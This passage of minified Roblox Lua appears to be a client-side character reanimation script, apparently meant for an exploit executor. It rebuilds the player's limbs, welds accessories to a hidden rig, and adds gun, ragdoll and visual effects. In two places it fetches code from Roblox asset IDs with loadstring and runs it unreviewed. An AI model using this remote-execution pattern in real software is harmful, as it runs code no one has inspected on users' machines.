dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;rh=game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Hip"]:Destroy()rh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rh.Part1=game:GetService("Players").LocalPlayer.Character["Right Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Leg"].Name="rh"rh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["rh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;lh=game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Hip"]:Destroy()lh.Parent=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part0=game:GetService("Players").LocalPlayer.Character.Torso;lh.Part1=game:GetService("Players").LocalPlayer.Character["Left Leg"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Leg"].Name="lh"lh.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Leg"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["lh"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Left Leg"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;mouse=game:GetService("Players").LocalPlayer:GetMouse()Part0=Instance.new("Part")SpecialMesh1=Instance.new("SpecialMesh")Part0.Name="Gun"Part0.Parent=mas;Part0.CanCollide=false;Part0.Size=Vector3.new(0.970000505,2.46999931,0.380000055)Part0.CFrame=CFrame.new(-211.74501,2.6168952,37.920002,1,0,0,0,1,0,0,0,1)Part0.Position=Vector3.new(-211.74501,2.6168952,37.920002)SpecialMesh1.Parent=Part0;SpecialMesh1.Scale=Vector3.new(0.00499999989,0.00499999989,0.00499999989)SpecialMesh1.MeshType=Enum.MeshType.FileMesh;SpecialMesh1.Scale=Vector3.new(0.00499999989,0.00499999989,0.00499999989)cankys=true;weld=Instance.new("Weld",Part0)weld.Part0=game:GetService("Players").LocalPlayer.Character["Left Arm"]weld.Part1=Part0;weld.C0=CFrame.new(0.158004761,-1.63815379,-1.00455856,-5.79879307e-22,9.29214533e-23,1,-0.587791622,-0.809012473,-2.65673535e-22,0.809012473,-0.587791622,5.23747954e-22)function killyourself(dr)if cankys then cankys=false;Character:WaitForChild("Left Arm").Attachment.Position=Vector3.new(0.5,-0.5,-0.5)R.Gun.Handle.Attachment.Rotation=Vector3.new(-160,-15,45)local ds=Instance.new("Weld",game:GetService("Players").LocalPlayer.Character.Torso)ds.Part0=game:GetService("Players").LocalPlayer.Character.Torso;ds.Part1=game:GetService("Players").LocalPlayer.Character["Right Arm"]ds.C0=CFrame.new(1.5,0,0,1,-1.6395192e-43,0,-1.6395192e-43,1,0,0,0,1)local dt=Instance.new("Weld",game:GetService("Players").LocalPlayer.Character.Torso)dt.Part0=game:GetService("Players").LocalPlayer.Character.Torso;dt.Part1=game:GetService("Players").LocalPlayer.Character["Left Arm"]dt.C0=CFrame.new(-1.5,0,0,1,-1.6395192e-43,0,-1.6395192e-43,1,0,0,0,1)for T=0,2,0.02 do weld.C0=weld.C0:lerp(CFrame.new(0.720336914,-0.258590698,-0.514060974,0.409927189,0.572569966,-0.710018694,0.0567400455,0.760912359,0.646370947,0.910354853,-0.305250764,0.279430419),T)dt.C0=dt.C0:lerp(CFrame.new(-0.832244873,0.405325174,-1.44667816,0.719340205,-0.634600103,-0.28254649,-0.214658037,0.183768019,-0.959245205,0.660660148,0.750674427,-0.00403028121),T)ds.C0=ds.C0:lerp(CFrame.new(0.921920776,0.294008493,-1.1861496,0.88295126,0.469464868,6.12843053e-07,-0.0490720123,0.0922940373,-0.994521856,-0.466893107,0.878114343,0.104528703),T)game:GetService("RunService").RenderStepped:wait()end;function ragdoll()end;wait(1)R.Gun.Handle.Attachment.Rotation=Vector3.new(-120,-15,45)wait(0.05)LocalPlayer=game:GetService("Players").LocalPlayer;function Iterate(du,a4)for T,v in next,du:GetChildren()do a4(v)game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Velocity=game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame.lookVector*-50 end end;limbs={["Right Leg"]=true,["Right Arm"]=true,["Left Leg"]=true,["Left Arm"]=true}Iterate(LocalPlayer.Character,function(v)if v:IsA("BasePart")then local dv=Instance.new("Attachment")dv.Parent=v;dv.Name=v.Name.."[Attachment]"if limbs[v.Name]then dv.Position=Vector3.new(0,v.Size.Y/2,0)elseif v.Name=="Head"then dv.Position=Vector3.new(0,-v.Size.Y/2,0)dv.Rotation=Vector3.new(0,0,-90)end end end)local dw=Instance.new("Attachment")dw.Position=Vector3.new(-.5,-1,0)dw.Rotation=Vector3.new(0,-90,0)local dx=Instance.new("Attachment")dx.Position=Vector3.new(.5,-1,0)dx.Rotation=Vector3.new(0,-90,0)dx.Parent,dw.Parent=LocalPlayer.Character.Torso,LocalPlayer.Character.Torso;jointAttachments={['Head']={['Attachment0']=LocalPlayer.Character.Torso['NeckAttachment'],['Attachment1']=LocalPlayer.Character.Head['Head[Attachment]']},['Left Arm']={['Attachment0']=LocalPlayer.Character.Torso['LeftCollarAttachment'],['Attachment1']=LocalPlayer.Character['Left Arm']['Left Arm[Attachment]']},['Right Arm']={['Attachment0']=LocalPlayer.Character.Torso['RightCollarAttachment'],['Attachment1']=LocalPlayer.Character['Right Arm']['Right Arm[Attachment]']},['Left Leg']={['Attachment0']=dw,['Attachment1']=LocalPlayer.Character['Left Leg']['Left Leg[Attachment]']},['Right Leg']={['Attachment0']=dx,['Attachment1']=LocalPlayer.Character['Right Leg']['Right Leg[Attachment]']}}LocalPlayer.Character.Humanoid.PlatformStand=true;Iterate(LocalPlayer.Character,function(v)if v:IsA("BasePart")then if jointAttachments[v.Name]then local dy=Instance.new("BallSocketConstraint")dy.Parent=v;dy.Radius=0.15;dy.Attachment0,dy.Attachment1=jointAttachments[v.Name]['Attachment0'],jointAttachments[v.Name]['Attachment1']end end end)Iterate(LocalPlayer.Character.Torso,function(v)if v:IsA("Motor")then v:Remove()end end)game:GetService("Players").LocalPlayer.Character.Humanoid.Health=0 end end;mouse.Button1Down:connect(killyourself)for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="ra"then v.Transparency=1 end end;for T,v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren())do if v.Name=="la"then v.Transparency=1 end end;Character.Head.Transparency=0;Character.Torso.Transparency=0;Character["Right Arm"].Transparency=0;Character["Left Arm"].Transparency=0;Character["Right Leg"].Transparency=0;Character["Left Leg"].Transparency=0;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=250;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=250 end;W(R.Gun.Handle,Character["Left Arm"])R.Gun.Handle.Attachment.Rotation=Vector3.new(-140,0,180)Character:WaitForChild("Left Arm"):FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Left Arm").Attachment.Position=Vector3.new(0.20,-1.25,-0.75)end;function Clickey5()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local L=game:GetService("Players").LocalPlayer.Name;game:GetService("Players").LocalPlayer.Character["macaron"].Name="macaron1"game:GetService("Players").LocalPlayer.Character["macaron"].Name="macaron2"game:GetService("Players").LocalPlayer.Character["macaron"].Name="macaron3"game:GetService("Players").LocalPlayer.Character["macaron"].Name="macaron4"game:GetService("Players").LocalPlayer.Character["macaron"].Name="macaron5"game:GetService("Players").LocalPlayer.Character["MeshPartAccessory"].Name="MeshPartAccessory1"game:GetService("Players").LocalPlayer.Character["MeshPartAccessory"].Name="MeshPartAccessory2"local R={torso=Character:WaitForChild("Poppin' Eyes"),leftarm=Character:WaitForChild("macaron1"),leftarm1=Character:WaitForChild("macaron2"),rightarm=Character:WaitForChild("macaron3"),rightarm1=Character:WaitForChild("macaron4"),leftleg=Character:WaitForChild("macaron5"),leftleg1=Character:WaitForChild("ChocolateBarAccessory"),rightleg=Character:WaitForChild("MeshPartAccessory1"),rightleg1=Character:WaitForChild("MeshPartAccessory2")}local S={head=Character:WaitForChild("Hollow")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;loadstring(game:GetObjects("rbxassetid://5717307758")[1].Source)()game:GetService("Players").LocalPlayer.Chatted:connect(function(P)if P=="swap"then game:GetService("Players").LocalPlayer.Character=workspace:WaitForChild(L).Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="back"then game:GetService("Players").LocalPlayer.Character=workspace:WaitForChild(L)game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end end)W(S.head.Handle,Character.Trash["Head"])W(R.torso.Handle,Character.Trash["Torso"])W(R.rightarm.Handle,Character.Trash["Right Arm"])W(R.rightarm1.Handle,Character.Trash["Right Arm"])W(R.leftarm.Handle,Character.Trash["Left Arm"])W(R.leftarm1.Handle,Character.Trash["Left Arm"])W(R.rightleg.Handle,Character.Trash["Right Leg"])W(R.rightleg1.Handle,Character.Trash["Right Leg"])W(R.leftleg.Handle,Character.Trash["Left Leg"])W(R.leftleg1.Handle,Character.Trash["Left Leg"])R.torso.Handle.Attachment.Rotation=Vector3.new(90,0,0)Character.Trash:WaitForChild("Right Arm"):FindFirstChild("Attachment").Name="Attachment69"Character.Trash:WaitForChild("Right Arm"):FindFirstChild("Attachment").Name="Attachment420"Character.Trash:WaitForChild("Left Arm"):FindFirstChild("Attachment").Name="Attachment69"Character.Trash:WaitForChild("Left Arm"):FindFirstChild("Attachment").Name="Attachment420"Character.Trash:WaitForChild("Right Leg"):FindFirstChild("Attachment").Name="Attachment69"Character.Trash:WaitForChild("Right Leg"):FindFirstChild("Attachment").Name="Attachment420"Character.Trash:WaitForChild("Left Leg"):FindFirstChild("Attachment").Name="Attachment69"Character.Trash:WaitForChild("Left Leg"):FindFirstChild("Attachment").Name="Attachment420"Character.Trash:WaitForChild("Right Arm").Attachment69.Position=Vector3.new(0,0.25,0)Character.Trash:WaitForChild("Right Arm").Attachment420.Position=Vector3.new(0,-0.25,0)Character.Trash:WaitForChild("Left Arm").Attachment69.Position=Vector3.new(0,0.25,0)Character.Trash:WaitForChild("Left Arm").Attachment420.Position=Vector3.new(0,-0.25,0)Character.Trash:WaitForChild("Right Leg").Attachment69.Position=Vector3.new(0,0.25,0)Character.Trash:WaitForChild("Right Leg").Attachment420.Position=Vector3.new(0,-0.25,0)Character.Trash:WaitForChild("Left Leg").Attachment69.Position=Vector3.new(0,0.25,0)Character.Trash:WaitForChild("Left Leg").Attachment420.Position=Vector3.new(0,-0.25,0)function dieded()workspace:WaitForChild(L).Trash.Humanoid.Health=0;game:GetService("Players").LocalPlayer.Character=workspace:WaitForChild(L)game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;function deed()workspace:WaitForChild(L).Humanoid.Health=0;workspace:WaitForChild(L).Trash.Humanoid.Health=0 end;workspace:WaitForChild(L).Trash.Humanoid.Died:Connect(dieded)workspace:WaitForChild(L).Humanoid.Died:Connect(deed)game:GetService("Players").LocalPlayer.Character=game:GetService("Players").LocalPlayer.Character.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;wait(1/60)local TweenService=game:GetService("TweenService")loadstring(game:GetObjects("rbxassetid://5717065136")[1].Source)()local dz=LoadLibrary("RbxUtility")local Create=dz.Create;local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;ZTfade=false;ZT=false;broseph=false;EffectPack=Character.Extras:Clone()Character.Extras:Destroy()Target=CFrame.new()Character=Player.Character;PSize=.5;function makeGiant(Character,dA)local dB=Character:findFirstChild("HumanoidRootPart")local dC,dD={},{}local torso=Character:findFirstChild("Torso")local pos=torso.Position;local dE=torso.Size.Y;for U,v in pairs(dB:children())do if v:IsA("Motor6D")or v:IsA("Weld")or v:IsA("Motor")then table.insert(dC,{v,v.Part0,v.Part1})end end;for U,v in pairs(torso:children())do if v:IsA("Motor6D")or v:IsA("Weld")or v:IsA("Motor")then table.insert(dC,{v,v.Part0,v.Part1})end end;for U,v in pairs(Character:children())do if v:IsA("Accessory")then v:Destroy()elseif v:IsA("BasePart")then v.formFactor="Custom"v.Size=v.Size*dA end end;local bw=Character.Animate;local dF=bw:clone()bw:remove()for U,v in pairs(dC)do local dG=v[1].C1;local dH=v[1].C0;local a1,a2,dI=dG:toEulerAnglesXYZ()local dJ,dK,dL=dH:toEulerAnglesXYZ()dG=CFrame.new(dG.p*dA)*CFrame.Angles(a1,a2,dI)dH=CFrame.new(dH.p*dA)*CFrame.Angles(dJ,dK,dL)local dM=v[1]:clone()v[1]:remove()dM.C1=dG;dM.C0=dH;dM.Part1=v[3]dM.Part0=v[2]dM.Parent=Character.Torso;if dM.Name=="RootJoint"then dM.Parent=Character.HumanoidRootPart end end;dF.Parent=Character;Character:MoveTo(pos+Vector3.new(0,dA*dE/2,0))wait(0.1)end;makeGiant(Player.Character,PSize)local dN="221828863"Torso=Character.Torso;Head=Character.Head;Humanoid=Character.Humanoid;LeftArm=Character["Left Arm"]LeftLeg=Character["Left Leg"]RightArm=Character["Right Arm"]RightLeg=Character["Right Leg"]RootPart=Character["HumanoidRootPart"]local N="Idle"local dO=0;local dP=0;local dQ=0;local Mouse=Player:GetMouse()local dR=1;Animstep=0;WalkAnimMove=0.1;Combo=0;local dS=false;local dT=Character.HumanoidRootPart:FindFirstChild("RootJoint")local Neck=Character.Torso:FindFirstChild("Neck")local RootCF=CFrame.fromEulerAnglesXYZ(-1.57,0,3.14)local NeckCF=CFrame.new(0,1*PSize*1.5,0,-1,-0,-0,0,0,1,0,1,0)Head.Mesh.Scale=Head.Mesh.Scale*2;local dU=0;local dV=0;Effects=Instance.new("Folder",Character)Effects.Name="Effects"it=Instance.new;vt=Vector3.new;cf=CFrame.new;euler=CFrame.fromEulerAnglesXYZ;angles=CFrame.Angles;function cn(dW,dX,dY)return CFrame.new(dW*PSize,dX*PSize,dY*PSize)end;mr=math.rad;mememode=false;feral=false;IT=Instance.new;CF=CFrame.new;VT=Vector3.new;RAD=math.rad;C3=Color3.new;UD2=UDim2.new;BRICKC=BrickColor.new;ANGLES=CFrame.Angles;EULER=CFrame.fromEulerAnglesXYZ;COS=math.cos;ACOS=math.acos;SIN=math.sin;ASIN=math.asin;ABS=math.abs;MRANDOM=math.random;FLOOR=math.floor;local dZ="http://www.roblox.com/asset/?id=231316492"local d_=it("Sound",Torso)local e0=1;d_.EmitterSize=30;local e1=d_:Clone()playsong=true;d_.SoundId=dZ;if playsong==true then d_:play()elseif playsong==false then d_:stop()end;lastsongpos=0;crosshair=Instance.new("BillboardGui",Character)crosshair.Size=UDim2.new(10,0,10,0)crosshair.Enabled=false;imgl=Instance.new("ImageLabel",crosshair)imgl.Position=UDim2.new(0,0,0,0)imgl.Size=UDim2.new(1,0,1,0)imgl.Image="rbxassetid://578065407"imgl.BackgroundTransparency=1;imgl.ImageTransparency=.7;imgl.ImageColor3=Color3.new(1,1,1)crosshair.StudsOffset=Vector3.new(0,0,-1)local e2=1544355717;local e3=528589382;local e4=376976397;local e5=459523898;local e6=424195979;local e7=698824317;local e8=874376217;local e9=231917744;local ea=168513088;local eb=299058146;if Character:FindFirstChild("Animate")then Character.Animate:Destroy()end;function RemoveOutlines(ec)ec.TopSurface,ec.BottomSurface,ec.LeftSurface,ec.RightSurface,ec.FrontSurface,ec.BackSurface=10,10,10,10,10,10 end;CFuncs={Part={Create=function(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part")({Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee})RemoveOutlines(Part)return Part end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Weld={Create=function(ed,Part0,aA,eo,ep)local Weld=Create("Weld")({Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep})return Weld end},Sound={Create=function(eq,par,er,pit)coroutine.resume(coroutine.create(function()local dA=Create("Sound")({Volume=er,Pitch=pit or 1,SoundId="http://www.roblox.com/asset/?id="..eq,Parent=par or workspace})wait()dA:play()game:GetService("Debris"):AddItem(dA,6)end))end},ParticleEmitter={Create=function(ed,es,et,eu,k,ev,eg,ew,ex,ey,ez,eA,eB,eC,eD,eE,eF,eG,l,eH)local eI=Create("ParticleEmitter")({Parent=ed,Color=ColorSequence.new(es,et),LightEmission=eu,Size=k,Texture=ev,Transparency=eg,ZOffset=ew,Acceleration=ex,Drag=ey,LockedToPart=ez,VelocityInheritance=eA,EmissionDirection=eB,Enabled=eC,Lifetime=eD,Rate=eE,Rotation=eF,RotSpeed=eG,Speed=l,VelocitySpread=eH})return eI end}}for T,v in pairs(Character:GetChildren())do if v:IsA("Accessory")then end end;coroutine.resume(coroutine.create(function()wait(.5)for T,v in pairs(Character:GetDescendants())do if v:IsA("Accessory")or v:IsA("Shirt")or v:IsA("Pants")or v:IsA("CharacterMesh")or v:IsA("Decal")or v:IsA("Hat")or v:IsA("BodyColors")then v:Destroy()end end;local eJ=EffectPack.Outfit:Clone()for T,v in pairs(eJ:GetChildren())do if v:IsA("Shirt")or v:IsA("Pants")or v:IsA("BodyColors")or v:IsA("CharacterMesh")then v.Parent=Character end;if v:IsA("Decal")and v.Name=="face"then v.Parent=Head end;if v:IsA("BasePart")then local eK=v:FindFirstChildOfClass("Attachment")local eL=nil;for T,eM in pairs(Character:GetDescendants())do if eM:IsA("Attachment")and eM.Name==eK.Name and eM.Parent.Parent==Character then eL=eM end end;v.Parent=eL.Parent;local eN=weld(v,eL.Parent,v,CF())eN.C0=CF(eL.Position)*ANGLES(mr(eL.Orientation.x),mr(eL.Orientation.y),mr(eL.Orientation.z))eN.C1=CF(eK.Position)*ANGLES(mr(eK.Orientation.x),mr(eK.Orientation.y),mr(eK.Orientation.z))end end end))function Swait(eO)if eO==0 or eO==nil then game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()else for T=1,eO do game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()end end end;so=function(eq,par,er,pit)CFuncs.Sound.Create(eq,par,er,pit)end;function weld(eP,eQ,eR,dH)local weld=it("Weld")weld.Parent=eP;weld.Part0=eQ;weld.Part1=eR;weld.C0=dH;return weld end;rayCast=function(eS,eT,eU,eV)return game:service("Workspace"):FindPartOnRay(Ray.new(eS,eT.unit*(eU or 999.999)),eV)end;function SetTween(eW,eX,eY,eZ,e_)local f0=Enum.EasingStyle[eY]local f1=Enum.EasingDirection[eZ]local f2=1;if eW.Name=="Bullet"then f2=1 end;local f3=TweenInfo.new(e_/f2,f0,f1,0,false,0)local f4=eX;local f5=TweenService:Create(eW,f3,f4)f5:Play()end;function GatherAllInstances(ed,f6)local f7={}local eV=nil;if f6~=nil then eV=f6 end;local function f8(ed,eV)for T,v in pairs(ed:GetChildren())do if v~=eV then f8(v,eV)table.insert(f7,v)end end end;f8(ed,eV)return f7 end;function WeldAllTo(aA,Part2,f9)local fa=Part2.CFrame*f9;for T,v3 in pairs(GatherAllInstances(Part2))do if v3:isA("BasePart")then local fb=weld(v3,v3,aA,fa:toObjectSpace(v3.CFrame):inverse())v3.Anchored=false;v3.CanCollide=false;v3.Parent=aA end end;Part2:Destroy()end;local fc=Create("Texture")({Texture="http://www.roblox.com/asset/?id=1693385655",Color3=Color3.new(163/255,162/255,165/255)})function AddStoneTexture(ec)coroutine.resume(coroutine.create(function()for T=0,6,1 do local fd=fc:Clone()fd.Face=T;fd.Parent=ec end end))end;New=function(j,ed,ei,fe)local j=Instance.new(j)for ff,fg in pairs(fe or{})do j[ff]=fg end;j.Parent=ed;j.Name=ei;return j end;function Tran(fh)local fi=""if fh=="1"then fi="a"elseif fh=="2"then fi="b"elseif fh=="3"then fi="c"elseif fh=="4"then fi="d"elseif fh=="5"then fi="e"elseif fh=="6"then fi="f"elseif fh=="7"then fi="g"elseif fh=="8"then fi="h"elseif fh=="9"then fi="i"elseif fh=="10"then fi="j"elseif fh=="11"then fi="k"elseif fh=="12"then fi="l"elseif fh=="13"then fi="m"elseif fh=="14"then fi="n"elseif fh=="15"then fi="o"elseif fh=="16"then fi="p"elseif fh=="17"then fi="q"elseif fh=="18"then fi="r"elseif fh=="19"then fi="s"elseif fh=="20"then fi="t"elseif fh=="21"then fi="u"elseif fh=="22"then fi="v"elseif fh=="23"then fi="w"elseif fh=="24"then fi="x"elseif fh=="25"then fi="y"elseif fh=="26"then fi="z"elseif fh=="27"then fi="_"elseif fh=="28"then fi="0"elseif fh=="29"then fi="1"elseif fh=="30"then fi="2"elseif fh=="31"then fi="3"elseif fh=="32"then fi="4"elseif fh=="33"then fi="5"elseif fh=="34"then fi="6"elseif fh=="35"then fi="7"elseif fh=="36"then fi="8"elseif fh=="37"then fi="9"end;return fi end;function MaybeOk(fj,f9)local fk=""if fj==1 then local fl=""local fm=f9;local fn=""local fo=0;local fp=0;delay(wait(0),function()for v3=1,#fm do if string.sub(fm,0+v3,v3)==","then local fq=string.sub(fm,fp,v3-1)local fr=Tran(string.sub(fm,fp,v3-1))fo=fo+1;fl=fl..fr;fp=v3+1;fn=""end;fn=string.sub(fm,1,v3)wait()end;fk=fl;for v3=1,#fn do fn=string.sub(fm,-1,v3)end end)elseif fj==2 then print("fat")end;while fk==""do wait()end;return fk end;function CreateMesh2(fs,ft,fu,fv,fw,fx,fy)local fz=IT(fs)if fs=="SpecialMesh"then fz.MeshType=fu;if fv~="nil"and fv~=""then fz.MeshId="http://www.roblox.com/asset/?id="..fv end;if fw~="nil"and fw~=""then fz.TextureId="http://www.roblox.com/asset/?id="..fw end end;fz.Offset=fy or VT(0,0,0)fz.Scale=fx;fz.Parent=ft;return fz end;function CreatePart2(fA,ft,fB,fC,fD,fE,fF,fG,fH)local fI=IT("Part")fI.formFactor=fA;fI.Reflectance=fC;fI.Transparency=fD;fI.CanCollide=false;fI.Locked=true;fI.Anchored=true;if fH==false then fI.Anchored=false end;fI.BrickColor=BRICKC(tostring(fE))fI.Name=fF;fI.Size=fG;fI.Position=Torso.Position;fI.Material=fB;fI:BreakJoints()fI.Parent=ft;return fI end;local dA=IT("Sound")function CreateSound2(fJ,ft,fK,fL,fM)local fN=nil;coroutine.resume(coroutine.create(function()fN=dA:Clone()fN.Parent=ft;fN.Volume=fK;fN.Pitch=fL;fN.SoundId="http://www.roblox.com/asset/?id="..fJ;fN:play()if fM==true then fN.Looped=true else repeat wait(1)until fN.Playing==false;fN:remove()end end))return fN end;function WACKYEFFECT(fO)local fP=fO.EffectType or"Sphere"local fG=fO.Size or VT(1,1,1)local fQ=fO.Size2 or VT(0,0,0)local fD=fO.Transparency or 0;local fR=fO.Transparency2 or 1;local fS=fO.CFrame or Torso.CFrame;local fT=fO.MoveToPos or nil;local fU=fO.RotationX or 0;local fV=fO.RotationY or 0;local fW=fO.RotationZ or 0;local fB=fO.Material or"Neon"local fX=fO.Color or C3(1,1,1)local fY=fO.Time or 45;local fZ=fO.SoundID or nil;local f_=fO.SoundPitch or nil;local g0=fO.SoundVolume or nil;coroutine.resume(coroutine.create(function()local g1=false;local g2=nil;local g3=CreatePart2(3,Effects,fB,0,fD,BRICKC("Pearl"),"Effect",VT(1,1,1),true)if fZ~=nil and f_~=nil and g0~=nil then g1=true;g2=CreateSound2(fZ,g3,g0,f_,false)end;g3.Color=fX;local g4=nil;if fP=="Sphere"then g4=CreateMesh2("SpecialMesh",g3,"Sphere","","",fG,VT(0,0,0))elseif fP=="Cylinder"then g4=CreateMesh2("SpecialMesh",g3,"Cylinder","","",fG,VT(0,0,0))elseif fP=="Block"then g4=IT("BlockMesh",g3)g4.Scale=VT(fG.X,fG.X,fG.X)elseif fP=="Cube"then g4=IT("BlockMesh",g3)g4.Scale=VT(fG.X,fG.X,fG.X)elseif fP=="Wave"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","20329976","",fG,VT(0,0,-fG.X/8))elseif fP=="Ring"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","559831844","",VT(fG.X,fG.X,0.1),VT(0,0,0))elseif fP=="Slash"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","662586858","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Round Slash"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","662585058","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Swirl"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","1051557","",fG,VT(0,0,0))elseif fP=="Skull"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","4770583","",fG,VT(0,0,0))elseif fP=="Crystal"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","9756362","",fG,VT(0,0,0))elseif fP=="Crown"then g4=CreateMesh2("SpecialMesh",g3,"FileMesh","173770780","",fG,VT(0,0,0))end;if g4~=nil then local g5=nil;if fT~=nil then g5=(fS.p-fT).Magnitude/fY end;local g6=fG-fQ;local g7=fD-fR;if fP=="Block"then SetTween(g3,{CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))},"Linear","InOut",fY/60)else SetTween(g3,{CFrame=fS},"Linear","InOut",0)end;wait()SetTween(g3,{Transparency=g3.Transparency-g7},"Linear","InOut",fY/60)if fP=="Block"then SetTween(g3,{CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))},"Linear","InOut",0)else SetTween(g3,{CFrame=g3.CFrame*ANGLES(RAD(fU),RAD(fV),RAD(fW))},"Linear","InOut",0)end;if fT~=nil then local g8=g3.Orientation;SetTween(g3,{CFrame=CF(fT)},"Linear","InOut",fY/60)SetTween(g3,{Orientation=g8},"Linear","InOut",fY/60)end;g4.Scale=g4.Scale-g6/fY;SetTween(g4,{Scale=fQ},"Linear","InOut",fY/60)if fP=="Wave"then SetTween(g4,{Offset=VT(0,0,-g4.Scale.X/8)},"Linear","InOut",fY/60)end;for g9=1,fY+1 do wait(.05)if fP=="Block"then else end;if fT~=nil then local g8=g3.Orientation end end;game:GetService("Debris"):AddItem(g3,15)if g1==false then g3:remove()else g2.Stopped:Connect(function()g3:remove()end)end else if g1==false then g3:remove()else repeat wait()until g2.Playing==false;g3:remove()end end end))end;function CreatePart(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part"){Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee}RemoveOutlines(Part)return Part end;local ga=Create("ParticleEmitter"){Color=ColorSequence.new(Color3.new(1,1,1),Color3.new(170/255,255/255,255/255)),Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,1),NumberSequenceKeypoint.new(.75,.4),NumberSequenceKeypoint.new(1,1)}),Size=NumberSequence.new({NumberSequenceKeypoint.new(0,.5),NumberSequenceKeypoint.new(1,.0)}),Texture="rbxassetid://241922778",Lifetime=NumberRange.new(0.55,0.95),Rate=100,VelocitySpread=180,Rotation=NumberRange.new(0),RotSpeed=NumberRange.new(-200,200),Speed=NumberRange.new(8.0),LightEmission=1,LockedToPart=false,Acceleration=Vector3.new(0,0,0),EmissionDirection="Top",Drag=4,Enabled=false}local 